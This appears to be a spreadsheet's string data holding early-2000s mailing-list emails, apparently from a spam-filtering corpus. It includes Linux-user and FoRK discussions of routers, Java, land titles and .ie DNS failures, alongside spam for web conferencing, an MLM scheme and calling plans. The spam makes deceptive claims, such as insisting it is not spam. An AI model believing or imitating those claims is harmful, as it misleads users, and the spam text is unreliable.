 &gt; &gt;
 &gt; &gt;
 &gt; &gt;
 &gt; &gt;
 &gt; &gt; -------------------------------------------------------
 &gt; &gt; This sf.net email is sponsored by: OSDN - Tired of that same old
 &gt; &gt; cell phone?  Get a new here for FREE!
 &gt; &gt; https://www.inphonic.com/r.asp?r=sourceforge1&amp;refcode1=vs3390
 &gt; &gt; _______________________________________________
 &gt; &gt; Razor-users mailing list
 &gt; &gt; Razor-users@lists.sourceforge.net
 &gt; &gt; https://lists.sourceforge.net/lists/listinfo/razor-users
 &gt;
 &gt;
 &gt;
 &gt; -------------------------------------------------------
 &gt; This sf.net email is sponsored by: OSDN - Tired of that same old
 &gt; cell phone?  Get a new here for FREE!
 &gt; https://www.inphonic.com/r.asp?r=sourceforge1&amp;refcode1=vs3390
 &gt; _______________________________________________
 &gt; Razor-users mailing list
 &gt; Razor-users@lists.sourceforge.net
 &gt; https://lists.sourceforge.net/lists/listinfo/razor-users
 &gt;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</si>
  <si>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[ILUG] adsl router modem combo
</t>
  </si>
  <si>
    <t xml:space="preserve">It seems to only support PPPoA and not PPPoE. You need one that supports
 PPPoE, if you want torun it in routed IP mode. If you are using it as a
 bridge, it'll probably work, but you'd be left leaving the computer on,
 which would defeat the purpose of getting a router.
 The best router I've come accross is the Zyxel 643. Eircom supply this,
 but if you have alook online you can probably find it cheaper to buy
 online from America or the UK.
 Hope this is useful,
 Joe
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [zzzzteana] Language problems
</t>
  </si>
  <si>
    <t xml:space="preserve">Ananova: 
 Newspaper's readers complain over 'let's have sex' picture caption
 Readers of an African newspaper have complained after a picture caption
 about jewellery contained the words "let's have sex".
 The mix-up highlights the problems caused by the wide range of languages
 spoken in Namibia.
 Callers to the Namibian were angered by the use of the word tulumweni, which
 translates roughly as "let's have intercourse" in the Oshiwambo language.
 It was used in a caption concerning people in the Caprivi who use rings from
 the femidon - female condom - as jewellery.
 According to the The Namibian , an activist involved in care for Aids/HIV
 patients spelt the word tulumweni for the journalist.
 He intended it to mean "you will see for yourselves" in the Siyeyi tongue.
 One caller said the complainants "should be considerate of other people's
 languages. It is very clear that the picture was taken in the Caprivi ...And
 that the word is from Siyeyi. It is not Oshiwambo".
 Others indicated that various words might have different meanings in various
 Namibian languages, such as omakende, an Oshiwambo word for glasses which in
 Siyeyi means testicles.
 Another word with a double-meaning is tulikunde, which in Oshiwambo
 translates as let's talk, but which in Sisubiya translates as let's have
 intercourse.
 The Herero word for a hat is ekoli, which is an Oshiwambo word for a vagina.
 Story filed: 12:37 Tuesday 8th October 2002
 ------------------------ Yahoo! Groups Sponsor ---------------------~--&gt;
 4 DVDs Free +s&amp;p Join Now
 http://us.click.yahoo.com/pt6YBB/NXiEAA/MVfIAA/7gSolB/TM
 ---------------------------------------------------------------------~-&gt;
 To unsubscribe from this group, send an email to:
 forteana-unsubscribe@egroups.com
 Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ 
</t>
  </si>
  <si>
    <t xml:space="preserve">
 -----Original Message-----
 From: fork-admin@xent.com [mailto:fork-admin@xent.com]On Behalf Of
 Robert Harley
 Sent: Monday, September 02, 2002 2:55 AM
 To: fork@example.com
 Subject: RE: Java is for kiddies
 Reza B'Far wrote:
 &gt;This thread kind of surprises me... I started coding with C, then C++, and
 &gt;moved on to Java... And, I think that:
 Robert Harley wrote:
 &gt;Looks like a case of "MY experience is comprehensive, YOUR'S is
 &gt;anecdotal, THEY don't know what they're talking about".
 Well, I sure don't claim that... I think most people on Fork probably have
 more programming knowledge than I do... There's lots of experience out
 here...
 Reza B'Far wrote:
 &gt;1.  The people who pay the wages don't give a flyin' heck what programming
 &gt;language you write things in... they just want it to work.
 Robert Harley wrote:
 &gt;In my experience, they do care.  It has to work certainly, and in
 &gt;particular it has to work with what they've already got, and it has to
 &gt;work on client's systems.
 &gt;My limited experience of Java started a few years ago when support on
 &gt;Linux was so terrible that I ran away screaming and haven't come back yet.
 Well, I think until recently, support for most things on Linux was kind of
 shady... Things have got much better... You're right in that the JDK used to
 suck on Linux... But then, IMHO, Linux is still maturing.... or at least
 development tools for Linux are maturing... I've been developing a few
 server side apps that run on Linux recently with JDK 1.3.x and they've had
 no problems with great performance.
 Robert Harley worte:
 &gt;Microsoft has announced that they plan to remove Java from Windows.
 &gt;They took it out of XP already and it has to be installed with a
 &gt;service pack.  Somehow, I can't imagine them removing the ability to
 &gt;run C programs.
 Hmmm... Do you really think that MS is pulling out Java because it's a "Bad"
 programming language or application platform?  You don't think this has
 anything to do with .NET being a competitor to Java do you?  Or that MS has
 basically copied Java (with some additional features) and called it C#?
 Isn't that alone an indication that they actually DO think that a VM is the
 right way to go for most high level applications?
 Reza B'Far wrote:
 &gt;2.  C and C++ forces the developer to solve problems such as memory
 &gt;management over and over again.
 Robert Harley wrote:
 &gt;Can't say I spend any noticeable amount of time on memory management
 &gt;issues, apart from the fact that I frequently need &gt; 4 GB.
 Hmmm again.... You're telling me that you've never had a nasty bug that took
 you a couple of days to track down that had to do with a memory leak?  I am
 not the best C/C++ programmer... not even close... But I've known really
 good ones... and even they have nasty bugs that have to do with memory
 management, however occasional they may be.
 &gt;It's about design patterns, architecture, high level stuff...
 Robert Harley wrote:
 &gt;If your problem just requires application of a "design pattern" to solve,
 &gt;then it's trivial anyway irrespective of language.
 Wow!  So you're telling me that unless the application involves
 bit-counting, it's trivial?  What about the application itself?  What about
 high level problems such as task distribution, work-flow, etc.?  Aren't most
 high level problems solved with high level solutions like design patterns?
 Or do you solve high level problems by writing optimal C/C++ code?  For
 example, do you think that most people working on collaboration frameworks
 (there are lots of them on this list), are working on writing an operating
 system with assembly that provides for a collaborative environment?
 &gt;I am amazed by the amount of time wasted by people talking about low
 &gt;level problems that have been solved 10 million times over and over
 &gt;and over again...
 Robert Harley wrote:
 &gt;You appear to be gratuitously asserting that C programmers waste time
 &gt;on irrelevant low-level problems and Java programmers don't.  Depends
 &gt;entirely on the programmer, not the language.
 I can see how you could infer this. However, what I believe to really be the
 case is that Java is one of the best languages for writing large
 applications with many components that involves the collaboration of more
 than three programmers.  In those cases, it's always very hard to get the
 programmers to agree on API's, memory management techniques, etc.  With
 Java, the JCP takes care of the discussions so that you don't sit around in
 a long meeting trying to decide what API to use to hook up to a database
 (JDBC) or a messaging bus (JMS).
 &gt;3.  Java is not just a programming language! It's also a platform...
 Robert Harley wrote:
 &gt;Buzzword.
 YIKES!  Have you written db code with C/C++ for different databases (just an
 example)?  Tried porting a persistence layer from Windows to Unix?  Say you
 have Informix running on Solaris and you want to port to Windows with MS SQL
 (bad idea...but for the sake of the example), would you rather deal with
 JDBC port or C/C++ port that uses Informix drivers and now you have to use
 ODBC?
 &gt;a monolithic set of API's or a crap load of different API's slicing
 &gt;and dicing the same problems 50 different ways?
 Robert Harley wrote:
 &gt;Unsupported assertion.
 So, are you saying that there is a standard set of API's for C/C++ for
 everything? (aside to the minimal ANSI stuff).  Is there a standard way of
 dealing with C/C++ applications for various domain problems (messaging,
 database persistence, etc.) that rivals Java?  I'd like to know if there is
 one accepted by everyone who writes C/C++... In that case, I claim
 ignorance...
 Not suggesting that Java is the golden hammer.... Just that C/C++ is
 overkill for most things... I even coded in VB... But VB is a true disgrace
 to programming... It's just lame... Java is Object Oriented... (no
 flame-mail from the anti-OO people please... that is a religious
 discussion...) and relatively clean... And I don't think that every "Kid"
 can write a well designed Java program.  Kids typically don't understand
 various design patterns and principles... To my experience, they actually
 tend to think more of the low level problems, wanting to rewrite and
 reinvent the world... a tendency that is much more possible, IMHO, in C/C++
 than in Java due to existence of standard API's.
</t>
  </si>
  <si>
    <t xml:space="preserve">Tom wrote:
 &gt;On Mon, 22 Jul 2002, Adam Rifkin wrote:
 &gt;
 &gt;--]By JOHN MARKOFF
 &gt;     Ahhh the ahole reporter we all love to sneer at:)-
 &gt;
 &gt;--]SAN FRANCISCO, July 21 -- In a significant challenge to Microsoft,
 &gt;--]RealNetworks plans to announce a new version of its software on Monday
 &gt;--]that can distribute audio and video in a range of formats, including
 &gt;--]Microsoft's own proprietary Windows Media.
 &gt;
 &gt;Real is more currupt that MS in so many real ways its astounding Real and
 &gt;MS CEOS dont felate each other at tech and mass media conferences.
 &gt;
 &gt;Real needs to die and die horribly. Thier biz practices alone give them an
 &gt;instant berth in the 5th circle of hell. ALl the crap they foist on
 &gt;systems during installation gets em free passes to all the other circles.
 &gt;
 &gt;http://xent.com/mailman/listinfo/fork
 &gt;  
 &gt;
 Well, just to take this thread off topic - does anyone know what's 
 involved in serving streaming video? I assume that
  the only practical alternatives are MS and Real, and that it's likely 
 to cost some $$$ for the software.
 Owen
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: New, easy to use web conferencing software
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;HTML&gt;&lt;HEAD&gt;&lt;TITLE&gt;New Web Technology&lt;/TITLE&gt;
 &lt;META http-equiv=3DContent-Type content=3D"text/html; charset=3Dwindows-12=
 52"&gt;
 &lt;META content=3D"MSHTML 5.50.4134.600" name=3DGENERATOR&gt;&lt;/HEAD&gt;
 &lt;BODY vLink=3D#c0c0c0 link=3D#c0c0c0 bgColor=3D#EAEAAE leftMargin=3D0&gt;&lt;FON=
 T 
 face=3DMicrosoft, Sans Sarif&gt;
 &lt;P&gt;
 &lt;CENTER&gt;
 &lt;TABLE width=3D560 border=3D0&gt;
   &lt;TBODY&gt;
   &lt;TR&gt;
     &lt;TD align=3Dmiddle&gt;&lt;B&gt;&lt;FONT color=3D#42426F size=3D6&gt;UNLIMITED WEB CON=
 FERENCING&lt;/font&gt;&lt;/b&gt;
       &lt;HR&gt;&lt;FONT color=3D#2F2F4F size=3D4&gt;Subscribe to the Web Conference C=
 enter for only $40.00 per month!
 &lt;/FONT&gt;
 &lt;br&gt;
 &lt;FONT color=3D#42426F size=3D3&gt;(Connects up to 15 participants at a time p=
 lus audio charges)&lt;/font&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;P&gt;
 &lt;TABLE width=3D475 border=3D0&gt;
   &lt;TBODY&gt;
   &lt;TR&gt;
     &lt;TD align=3D"left"&gt;&lt;FONT color=3D#2F2F4F size=3D3&gt;&lt;B&gt;
       &lt;LI&gt;Manage your meetings virtually on line 
       &lt;LI&gt;Application sharing
       &lt;LI&gt;Multi-platform compatible &lt;/B&gt;(no software needed)
       &lt;LI&gt;&lt;B&gt;Call anytime, from anywhere, to anywhere 
       &lt;LI&gt;Unlimited usage for up to 15 participants&lt;/b&gt; (larger groups ava=
 ilabale)
       &lt;LI&gt;&lt;b&gt;Lowest rate $.18 cents per minunte for audio &lt;/b&gt;(toll charge=
 s included)
       &lt;LI&gt;&lt;b&gt;Quality, easy to use service
       &lt;LI&gt;Numerous interactive features&lt;/B&gt;&lt;/FONT&gt;&lt;/LI&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;=
 /TABLE&gt;
 &lt;P&gt;
 &lt;TABLE width=3D500 border=3D0&gt;
   &lt;TBODY&gt;
   &lt;TR&gt;
     &lt;TD align=3D"left"&gt;&lt;FONT color=3D#42426F size=3D4&gt;&lt;B&gt;FREE DEMO&lt;/B&gt;&lt;/fo=
 nt&gt;
 &lt;BR&gt;&lt;BR&gt;
 &lt;FONT color=3D#42426F size=3D5&gt;&lt;B&gt;Eliminate or Reduce Travel Expense&lt;/b&gt;&lt;/=
 font&gt;
 &lt;BR&gt;&lt;FONT color=3D#2F2F4F size=3D4&gt;&lt;B&gt;
 Try this on for savings... 
 and turn those unnecessary trips into problem solving and fact finding con=
 ferences, 
 saving time and wear and tear on your overworked business staff. 
 &lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;
 &lt;P&gt;
 &lt;TABLE width=3D350 border=3D0&gt;
   &lt;TBODY&gt;
   &lt;TR&gt;
     &lt;TD align=3Dmiddle&gt;&lt;FONT color=3D#42426F size=3D4&gt;To find out more abo=
 ut this revolutionary concept,
 fill out the form below.&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;
 &lt;P&gt;&lt;FONT color=3D#2F2F4F size=3D2&gt;&lt;b&gt;Required Input Field&lt;FONT color=3D#5C=
 4033 
 size=3D2&gt;*&lt;/FONT&gt;&lt;/b&gt; 
 &lt;P&gt;
 &lt;TABLE cellSpacing=3D0 borderColorDark=3D#333300 cellPadding=3D3 width=3D6=
 00 
 borderColorLight=3D#ffffcc&gt;
   &lt;TBODY&gt;
   &lt;TR&gt;
     &lt;TD align=3Dmiddle&gt;
       &lt;FORM action=3Dmailto:webc@marketing401.com?subject=3DWebC_Inquiry 
       method=3Dpost encType=3Dtext/plain&gt;
       &lt;TABLE width=3D"100%"&gt;
         &lt;TBODY&gt;
         &lt;TR&gt;
           &lt;TD align=3Dright width=3D"50%"&gt;&lt;FONT 
             face=3D"Arial, Helvetica, sans-serif" color=3D#2F2F4F
           size=3D2&gt;&lt;b&gt;Name&lt;/b&gt;&lt;/FONT&gt;&lt;FONT 
             face=3D"Arial, Helvetica, sans-serif" color=3D#5C4033 
             size=3D2&gt;*&lt;/FONT&gt;&lt;/TD&gt;
           &lt;TD&gt;&lt;INPUT name=3DNAME&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD align=3Dright width=3D"50%"&gt;&lt;FONT 
             face=3D"Arial, Helvetica, sans-serif" color=3D#2F2F4F size=3D2=
 &gt;&lt;b&gt;Web 
             Address&lt;/b&gt;&lt;/FONT&gt;&lt;/TD&gt;
           &lt;TD&gt;&lt;INPUT value=3Dhttp:// name=3DURL&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD align=3Dright width=3D"50%"&gt;&lt;FONT 
             face=3D"Arial, Helvetica, sans-serif" color=3D#2F2F4F size=3D2=
 &gt;&lt;b&gt;Company 
             Name&lt;/b&gt;&lt;/FONT&gt;&lt;FONT 
             face=3D"Arial, Helvetica, sans-serif" color=3D#5C4033
             size=3D2&gt;*&lt;/FONT&gt;&lt;/TD&gt;
           &lt;TD&gt;&lt;INPUT name=3DCOMPANY_NAME&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD align=3Dright width=3D"50%"&gt;&lt;FONT 
             face=3D"Arial, Helvetica, sans-serif" color=3D#2F2F4F size=3D2=
 &gt;&lt;b&gt;
             State&lt;/b&gt;&lt;/FONT&gt;&lt;FONT 
             face=3D"Arial, Helvetica, sans-serif" color=3D#5C4033
             size=3D2&gt;*&lt;/FONT&gt;&lt;/TD&gt;
           &lt;TD&gt;&lt;INPUT size=3D2 name=3DSTATE&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD align=3Dright width=3D"50%"&gt;&lt;FONT 
             face=3D"Arial, Helvetica, sans-serif" color=3D#2F2F4F size=3D2=
 &gt;&lt;b&gt;Business 
             Phone&lt;/b&gt;&lt;/FONT&gt;&lt;FONT 
             face=3D"Arial, Helvetica, sans-serif" color=3D#5C4033 
             size=3D2&gt;*&lt;/FONT&gt;&lt;/TD&gt;
           &lt;TD&gt;&lt;INPUT name=3DBUS_PHONE&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD align=3Dright width=3D"50%"&gt;&lt;FONT 
             face=3D"Arial, Helvetica, sans-serif" color=3D#2F2F4F size=3D2=
 &gt;&lt;b&gt;Home 
             Phone&lt;/b&gt;&lt;/FONT&gt;&lt;/TD&gt;
           &lt;TD&gt;&lt;INPUT name=3DHOME_PHONE&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD align=3Dright width=3D"50%"&gt;&lt;FONT 
             face=3D"Arial, Helvetica, sans-serif" color=3D#2F2F4F size=3D2=
 &gt;&lt;b&gt;Email 
             Address&lt;/b&gt;&lt;/FONT&gt;&lt;FONT 
             face=3D"Arial, Helvetica, sans-serif" color=3D#5C4033
             size=3D2&gt;*&lt;/FONT&gt;&lt;/TD&gt;
           &lt;TD&gt;&lt;INPUT name=3DEMAIL&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;/TBODY&gt;&lt;/TABLE&gt;
       &lt;P&gt;&lt;INPUT type=3Dsubmit value=3D"Submit Information" name=3Dsubmit&gt; 
     &lt;/FORM&gt;&lt;/P&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;
 &lt;BR&gt;&lt;BR&gt;
 &lt;TABLE width=3D350&gt;
   &lt;TBODY&gt;
   &lt;TR&gt;
     &lt;TD align=3Dmiddle&gt;&lt;FONT color=3D#000000 size=3D1&gt;&lt;b&gt;All information g=
 iven herein is strictly confidential and will not be re-distributed
       for any reason other than for the specific use intended.&lt;/font&gt;&lt;/b&gt;&lt;=
 br&gt;
       &lt;FONT face=3D"Arial, Helvetica, sans-serif" color=3D#000000
       size=3D1&gt;To be removed from our distribution lists, please  
       &lt;A href=3D"mailto:remove@marketing401.com?subject=3DRemove"&gt;Click 
       here.&lt;FONT color=3D#666600&gt;&lt;/A&gt;&lt;/FONT&gt;.&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TA=
 BLE&gt;&lt;/P&gt;&lt;/CENTER&gt;&lt;/BODY&gt;&lt;/HTML&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [ILUG] STOP THE MLM INSANITY
</t>
  </si>
  <si>
    <t xml:space="preserve">Greetings!
 You are receiving this letter because you have expressed an interest in 
 receiving information about online business opportunities. If this is 
 erroneous then please accept my most sincere apology. This is a one-time 
 mailing, so no removal is necessary.
 If you've been burned, betrayed, and back-stabbed by multi-level marketing, 
 MLM, then please read this letter. It could be the most important one that 
 has ever landed in your Inbox.
 MULTI-LEVEL MARKETING IS A HUGE MISTAKE FOR MOST PEOPLE
 MLM has failed to deliver on its promises for the past 50 years. The pursuit 
 of the "MLM Dream" has cost hundreds of thousands of people their friends, 
 their fortunes and their sacred honor. The fact is that MLM is fatally 
 flawed, meaning that it CANNOT work for most people.
 The companies and the few who earn the big money in MLM are NOT going to 
 tell you the real story. FINALLY, there is someone who has the courage to 
 cut through the hype and lies and tell the TRUTH about MLM.
 HERE'S GOOD NEWS
 There IS an alternative to MLM that WORKS, and works BIG! If you haven't yet 
 abandoned your dreams, then you need to see this. Earning the kind of income 
 you've dreamed about is easier than you think!
 With your permission, I'd like to send you a brief letter that will tell you 
 WHY MLM doesn't work for most people and will then introduce you to 
 something so new and refreshing that you'll wonder why you haven't heard of 
 this before.
 I promise that there will be NO unwanted follow up, NO sales pitch, no one 
 will call you, and your email address will only be used to send you the 
 information. Period.
 To receive this free, life-changing information, simply click Reply, type 
 "Send Info" in the Subject box and hit Send. I'll get the information to you 
 within 24 hours. Just look for the words MLM WALL OF SHAME in your Inbox.
 Cordially,
 Siddhi
 P.S. Someone recently sent the letter to me and it has been the most 
 eye-opening, financially beneficial information I have ever received. I 
 honestly believe that you will feel the same way once you've read it. And 
 it's FREE!
 ------------------------------------------------------------
 This email is NEVER sent unsolicited.  THIS IS NOT "SPAM". You are receiving 
 this email because you EXPLICITLY signed yourself up to our list with our 
 online signup form or through use of our FFA Links Page and E-MailDOM 
 systems, which have EXPLICIT terms of use which state that through its use 
 you agree to receive our emailings.  You may also be a member of a Altra 
 Computer Systems list or one of many numerous FREE Marketing Services and as 
 such you agreed when you signed up for such list that you would also be 
 receiving this emailing.
 Due to the above, this email message cannot be considered unsolicitated, or 
 spam.
 -----------------------------------------------------------
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">
 Hello ~name~,
 If you ordered a flat-rate domestic calling product or a 20 minute free trial using a local access number, your service will be operating in about 24-48 hours or on your designated trial date and time.  Please try dialing the access number you found on your reseller's web page at:
 http://www.internationalfreecall.com
 If you ordered a flat-rate domestic calling product using a 1-800 toll-free access number, your service will be operating within 1-2 work days.
 Please try dialing 1-866-865-4548.
 In either case, when your service is switched on, you will hear a voice ask you to dial the number you are calling.
 You must dial 1+area code+7 digit number followed by # to make any calls: local or long distance.
 Example - To call www.internationalfreecall.com, you would dial the following after dialing your access number and listening for the voice:
 1-410-608-8178# 
 Please use this service for all your calling and you will never pay more than your monthly fee again. There are no taxes or surcharges, so dial away!
 Finally, I recommend entering the access number into your speed dial settings on your telephone.  This will make your service quicker and easier to use, and thus more enjoyable.
 If you have any questions, please contact us for more information.
 In addition, if you need product enhancements like 3-way calling, portable calling cards, international calling products, or marketing tools, please visit:
 http://www.internationalfreecall.com
 In the meantime, the other network on this free calling promotion is OPEX, which is offering 100 minutes of free long distance for trying their program.  
 Opex's usual rates are 4.5 cents per minute for domestic calls, with great international rates, too!
 For more information on OPEX, or to sign up, please click below:
 http://cognigen.net/opex/main.cgi?lietuva
 To unsubscribe from this mailing list, please click on:
 http://www.internationalfreecall.com/cgi-bin/aefs/subscribe.cgi?user=info&amp;listid=3.list&amp;id=5590
</t>
  </si>
  <si>
    <t xml:space="preserve">
 &gt;                                 You have multiple generations of
 &gt; peasants/squatters that cultivate and live on the lands almost as a
 &gt; human parts of the property package.
 When I'd read that "getting legal title
 can take 20 years", when I believe that
 1 year ought to be more than sufficient,
 (and helped by the Cairo reference) I'd
 assumed that we were talking about the
 urban poor.
 If I see people living in mansions, or
 even in suburban subdivisions, I assume
 they didn't have too much trouble with
 their titles.
 If I see people living in shanties and
 haphazard alleyways, I tend to assume
 their parcels weren't exactly recorded
 on the government maps, or paid for with
 a bank loan, especially when nearby vacant
 lots have shotgun wielding men presumably
 intent on keeping them "development" free.
 Now, it may be that "Manhattanites' view
 of America" to say that outside of Metro
 Manila, Davao, and maybe another city or
 two (Cebu?), everything else (literally)
 is the boondocks.  But going on that very
 broad assumption, I guess I'm describing
 the flip side of Mr. Roger's experience:
 the paisanos (who leave behind those who
 remain on a patron's rural land) move to
 Manila, and (the second assumption) squat
 in shantytowns there, at least until they
 can line up a middle-class job.
 So, going on two large assumptions, I can
 come up with a scenario under which title
 would take 20 years: a shantytown arises
 somewhere in the midst of a section (or
 whatever the Spanish used to divvy up the
 land) and it takes decades of arguing to
 put together a package which somehow can
 both compensate the owner and record lots
 for the inhabitants.  Just transferring
 title to an existing lot, between parties
 who have money, ought not to be a problem.
 The obvious solution, at least to us
 barking farting chihuahuas on FoRK, is
 to "introduce market mechanisms".  It is
 left as an exercise to come up with one
 which works when many of the agents (are
 perceived to) have negligible NPV.
 -Dave
 &gt;              [land reform] meant that all the agricultural producers had
 &gt; to plant crops all the time (profitable or not) ...
 What happened to more highly-capitalized
 land?  Putting in trees instead of crops
 sounds like it might sidestep that.
 &gt; Mr. Long, I think you'd particularly enjoy the De Soto work.
 On the "to find" list.  Any chance of
 an explanation of that "Bell Jar" in
 the meantime?
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [IIU] IE nameserver problems
</t>
  </si>
  <si>
    <t xml:space="preserve">James Raftery wrote:
 &gt; 
 &gt; I don't know what role ns0 plays in relation to the IE zone. It's
 &gt; certainly not involved in the regular resolution process. It may
 &gt; be involved in zone distribution as you suggest. IIRC (and I often
 &gt; don't) on Friday ns0 had a serial that none of the IE nameservers
 &gt; shared. Unfortunately I don't have a record of that.
 &gt;&gt;From indexing CNO, ns0 appears to be IEDR's CNO nameserver for its CNO
 domains (iedr.com and others).
 &gt; &gt; This whole thing does seriously bring into question IEDR's decision to
 &gt; &gt; outsource the technical admininstration of .ie to a company that
 &gt; &gt; apparently does not even admin its own DNS. It is a nice story though -
 &gt; &gt; almost as good as the time that .ie disappeared for 8 hours in July
 &gt; &gt; 1998.
 &gt; 
 &gt; ... and only you noticed :)
 &gt; [ Messages on the IEDR-FORUM list at the time don't support
 &gt;   your assertion ]
 Yeah but I was right and I was there. The people who were saying that it
 did not happen did not see the fadeout in progress. It only came back
 after the server was rebooted properly. However improbable it seemed at
 the time, the nameservers came back up after a power outage without the
 .ie zonefile. As a result it, there was nothing in the file that the
 secondaries picked up. At the time, I thought that the file was on an
 NFS. But if it regenerated after reboot, and the NFS input was not
 there, it would have generated a blank zonefile - that makes some sense.
 History now but it has an alarming relevance. :)
 &gt; As an aside, shortly after my note on Friday uucp-gw-1.pa.dec.com and
 &gt; uucp-gw-2.pa.dec.com stopped responding to DNS requests. So IE had
 &gt; two dead nameservers, four stuck a week in the past and three
 &gt; working correctly. Marvellous.
 Confirm that. The nameservers themselves had connectivity problems from
 what I could see and it was going on for a while, even *after* the
 initial SOA problems. 
 I am thinking of writing a simple .ie secondary state monitor for
 inclusion on WhoisIreland.com as these guys seem to be technologically
 incapable of running their own DNSes. What kind of distorted logic hands
 the admin of a national tld to a company that does not even handle DNS
 for its own domain? Whatever selection process IEDR used should be
 investigated by the relevant government department, especially as the
 company supposedly providing technical administration to IEDR did not
 actually spot this loss of synch. The IEDR contract with the company
 should be reviewed in the light of this event. This kind of 1 week loss
 of synch should not happen with a national domain. Ireland as E-hub -
 more like e-jit central! :)
 Regards...jmcc
 -- 
 ********************************************
 John McCormac            * Hack Watch News
 jmcc@hackwatch.com       * 22 Viewmount, 
 Voice:   +353-51-873640  * Waterford,
 BBS&amp;Fax: +353-51-850143  * Ireland
 http://www.hackwatch.com/~kooltek
 ********************************************
 -----BEGIN PGP PUBLIC KEY BLOCK-----
 Version: 2.6
 mQCNAzAYPNsAAAEEAPGTHaNyitUTNAwF8BU6mF5PcbLQXdeuHf3xT6UOL+/Od+z+
 ZOCAx8Ka9LJBjuQYw8hlqvTV5kceLlrP2HPqmk7YPOw1fQWlpTJof+ZMCxEVd1Qz
 TRet2vS/kiRQRYvKOaxoJhqIzUr1g3ovBnIdpKeo4KKULz9XKuxCgZsuLKkVAAUX
 tCJKb2huIE1jQ29ybWFjIDxqbWNjQGhhY2t3YXRjaC5jb20+tBJqbWNjQGhhY2t3
 YXRjaC5jb20=
 =sTfy
 -----END PGP PUBLIC KEY BLOCK-----
 _______________________________________________
 IIU mailing list
 IIU@iiu.taint.org
 http://iiu.taint.org/mailman/listinfo/iiu
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: Mplayer
</t>
  </si>
  <si>
    <t xml:space="preserve">Matthias Saou wrote:
 &gt;Once upon a time, Roi wrote :
 &gt;
 &gt;  
 &gt;
 &gt;&gt;Since I upgraded to redhat8 mplayer -vo sdl isnt working for me
 &gt;&gt;It gives me black screen and I only hear sound.
 &gt;&gt;
 &gt;&gt;can anyone help me with this ?
 &gt;&gt;    
 &gt;&gt;
 &gt;
 &gt;I'll test this as soon as I can.
 &gt;
 &gt;  
 &gt;
 &gt;&gt;btw,
 &gt;&gt;also the source rpm specified that I can do --without libdv
 &gt;&gt;but it didn't work, worked for lirc and arts.
 &gt;&gt;    
 &gt;&gt;
 &gt;
 &gt;Should be fixed : You probably had libdv-devel installed and MPlayer
 &gt;automatically detected it. The new spec file explicitely passes
 &gt;--disable-libdv when the package is rebuilt with --without libdv.
 &gt;  
 &gt;
 I didn't had libdv at all, I installed it just to install mplayer.
 &gt;Grab the "fr2.1" spec from here :
 &gt;http://freshrpms.net/builds/index.html?build=mplayer
 &gt;
 &gt;Matthias
 &gt;
 &gt;  
 &gt;
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Lord of the Ringtones: Arbocks vs. Seelecks
</t>
  </si>
  <si>
    <t xml:space="preserve">I can't believe I actually read a laugh-out-loud funny profile of the 
 *FCC Commissioner* fer crissakes! So the following article comes 
 recommended, a fine explanation of Michael Powell's extraordinary 
 equivocation.
 On the other hand, I can also agree with Werbach's Werblog entry... Rohit
 &gt; A Trip to F.C.C. World
 &gt;
 &gt; Nicholas Lemann has a piece in the New Yorker this week about FCC 
 &gt; Chairman Michael Powell. It's one of the first articles I've seen that 
 &gt; captures some of Powell's real personality, and the way he's viewed in 
 &gt; Washington. Unfortunately, Lemann ends by endorsing conventional 
 &gt; political wisdom. After describing how Powell isn't really a 
 &gt; fire-breathing ideological conservative, he concludes that, in essence, 
 &gt; Powell favors the inumbent local Bell telephone companies, while a 
 &gt; Democratic FCC would favor new entrants. I know that's not how Powell 
 &gt; sees the world, and though I disagree with him on many issues, I think 
 &gt; he's right to resist the old dichotomy.
 &gt;
 &gt; The telecom collapse should be a humbling experience for anyone who 
 &gt; went through it. The disaster wasn't the regulators' fault, as some 
 &gt; conservatives argue. But something clearly went horribly wrong, and 
 &gt; policy-makers should learn from that experience. Contrary to Lemann's 
 &gt; speculation, the upstart carriers won't be successful in a Gore 
 &gt; administration, because it's too late. Virtually all of them are dead, 
 &gt; and Wall Street has turned off the capital tap for the foreseeable 
 &gt; future. Some may survive, but as small players rather than 
 &gt; world-dominators.
 &gt;
 &gt; The battle between CLECs and RBOCs that Lemann so astutely parodies is 
 &gt; old news. The next important battle in telecom will be between those 
 &gt; who want to stay within the traditional boxes, and those who use 
 &gt; different models entirely. That's why open broadband networks and open 
 &gt; spectrum are so important. Whatever the regulatory environment, there 
 &gt; is going to be consolidation in telecom. Those left out in that 
 &gt; consolidation will face increasing pressure to create new pipes into 
